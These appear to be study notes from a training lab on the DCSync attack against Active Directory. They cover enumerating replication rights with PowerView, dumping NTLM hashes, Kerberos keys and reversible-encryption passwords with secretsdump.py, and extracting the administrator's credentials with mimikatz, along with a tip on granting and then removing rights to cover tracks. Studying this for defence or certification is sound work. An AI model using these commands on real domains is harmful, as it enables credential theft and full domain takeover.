15 - DCSync - JA Smith

# Introduction - DCSync is a technique for stealing the Active Directory password database by using the built-in `Directory Replication Service Remote Protocol`, which is used by Domain Controllers to replicate domain data - This allows an attacker to mimic a Domain Controller to retrieve user NTLM password hashes - The crux of the attack is requesting a Domain Controller to replicate passwords via the `DS-Replication-Get-Changes-All` extended right - If we had certain rights over a user with these replication right (such as [WriteDacl](https://bloodhound.specterops.io/resources/edges/write-dacl)), we could also add this privilege to a user under our control, execute the DCSync attack, and then remove the privileges to attempt to cover our track - DCSync replication can be performed using tools such as `mimikatz`, `Invoke-DCSync`, and Impacket’s `secretsdump.py` # Enum Groups and Replication Rights - Use `Get-DomainUser` to view target user's group membership ```powershell PS C:\htb> Get-DomainUser -Identity adunn |select samaccountname,objectsid,memberof,useraccountcontrol |fl ``` ![[images/Pasted image 20251103204807.png]] - Use `Get-ObjectACL` to view target user's replication rights ```powershell PS C:\htb> $sid= "S-1-5-21-3842939050-3880317879-2865463114-1164" PS C:\htb> Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl ``` ![[images/Pasted image 20251103204847.png]] # Performing DCSync from Linux - Once we confirm that the target user has the necessary replication rights, we can execute the DCsync attack with `secretsdump.py` ```bash secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/[email protected] ``` - If we check the files created using the `-just-dc` flag, we will see that there are three:![[images/Pasted image 20251103202912.png]] - one containing the NTLM hashes, - one that would contain cleartext passwords from the NTDS for any accounts set with [reversible encryption](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption) enabled, and - one containing Kerberos keys - We can also use the `-just-dc-ntlm` flag if we only want NTLM hashes - Or, we can specify `-just-dc-user <USERNAME>` to only extract data for a specific user # Performing DCSync from Windows - We need to run in the context of the user with DCSync privs using `runas.exe` ```cmd runas /netonly /user:INLANEFREIGHT\adunn powershell ``` ![[images/Pasted image 20251103203643.png]] - This spawns a new PowerShell session running as `adunn`, where can perform the DCSync attack with `mimikatz` ```cmd .\mimikatz.exe mimikatz # privilege::debug Privilege '20' OK mimikatz # dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator ``` ![[images/Pasted image 20251103203853.png]]